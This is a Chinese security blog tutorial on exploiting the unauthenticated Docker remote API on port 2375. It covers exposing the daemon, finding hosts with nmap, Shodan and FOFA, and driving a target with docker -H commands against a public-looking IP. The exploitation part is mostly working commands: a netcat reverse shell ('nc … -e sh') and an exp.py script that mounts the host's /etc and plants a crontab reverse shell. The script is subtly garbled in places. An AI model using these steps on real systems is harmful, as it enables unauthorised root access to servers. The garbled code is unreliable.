网安系列【15】之Docker未授权访问漏洞
文章目录
- Docker介绍
- Docker开启远程访问
- 漏洞发现
- 漏洞利用
- 反弹shell
- 写入crontab反弹shell
Docker介绍
- Docker是利用LXC来实现类似VM的功能,从而利用更加节省的硬件资源提供给用户更多的计算资源。同VM的方式不同,LXC其并不是一套硬件虚拟化方法-无法归属到全虚拟化、部分虚拟化和半虚拟化中的任意一个,而是一个操作系统级虚拟化方法,理解起来可能并不像VM那样直观。所以我们从虚拟化到docker要解决的问题出发,看看他是怎么满足用户虚拟化需求的。
Docker开启远程访问
systemctl status docker.service
vim /usr/lib/systemd/system/docker.service
-H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock
重新载入服务信息并重启docker
systemctl daemon-reload
systemctl restart docker.service
- 防火墙状态设置
ufw status
ufw allow 2375
ufw reload
漏洞发现
- 特定端口:2375
- 搜索引擎:shodan、fofa
nmap -A -p- -T4 -Pn xx.xx.xx.xx
[root@yang ~]# nmap -A -p 2375 -T4 -Pn localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2025-07-10 18:20 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00019s latency).
Other addresses for localhost (not scanned): ::1PORT STATE SERVICE VERSION
2375/tcp open docker Docker 25.0.1
| docker-version:
| Components:
|
| Version: 25.0.1
| Name: Engine
| Details:
| ApiVersion: 1.44
| BuildTime: 2024-01-23T23:09:31.000000000+00:00
| MinAPIVersion: 1.24
| Experimental: false
| Os: linux
| Arch: amd64
| KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
| GitCommit: 71fa3ab
| GoVersion: go1.21.6
|
| Version: 1.6.27
| Name: containerd
| Details:
| GitCommit: a1496014c916f9e62104b33d1bb5bd03b0858e59
|
| Version: 1.1.11
| Name: runc
| Details:
| GitCommit: v1.1.11-0-g4bccb38
|
| Version: 0.19.0
| Name: docker-init
| Details:
| GitCommit: de40ad0
| BuildTime: 2024-01-23T23:09:31.000000000+00:00
| ApiVersion: 1.44
| GoVersion: go1.21.6
| Arch: amd64
| MinAPIVersion: 1.24
| Os: linux
| Version: 25.0.1
| KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
| GitCommit: 71fa3ab
| Platform:
|_ Name: Docker Engine - Community
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: application/json
| Date: Thu, 10 Jul 2025 10:20:33 GMT
| Content-Length: 29
| {"message":"page not found"}
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 404 Not Found
| Content-Type: application/json
| Date: Thu, 10 Jul 2025 10:20:08 GMT
| Content-Length: 29
| {"message":"page not found"}
| HTTPOptions:
| HTTP/1.0 200 OK
| Api-Version: 1.44
| Docker-Experimental: false
| Ostype: linux
| Server: Docker/25.0.1 (linux)
| Date: Thu, 10 Jul 2025 10:20:08 GMT
| Content-Length: 0
| docker:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hopsOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.60 seconds
漏洞利用
- 通过api直接查看容器状态,可以使用version、info查看具体的信息,直接查看容器里的进程。
docker -H tcp://18.16.202.95:2375 version
docker -H tcp://18.16.202.95:2375 images
docker -H tcp://18.16.202.95:2375 info
docker -H tcp://18.16.202.95:2375 ps
- 利用创建命令创建并运行容器。
docker -H tcp://xx.xx.xx.xx:2375 run -it redis /bin/bash
反弹shell
- 攻击机开启监听
nc -lvvp 8030
- 目标机器执行
nc 192.168.1.21 8030 -e bin/sh
nc 192.168.1.21 8030 -e sh
写入crontab反弹shell
cd /root
cat exp.py
import dockerclient = docker.DockerClient(base_url='http://your-ip:2375')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw' }}):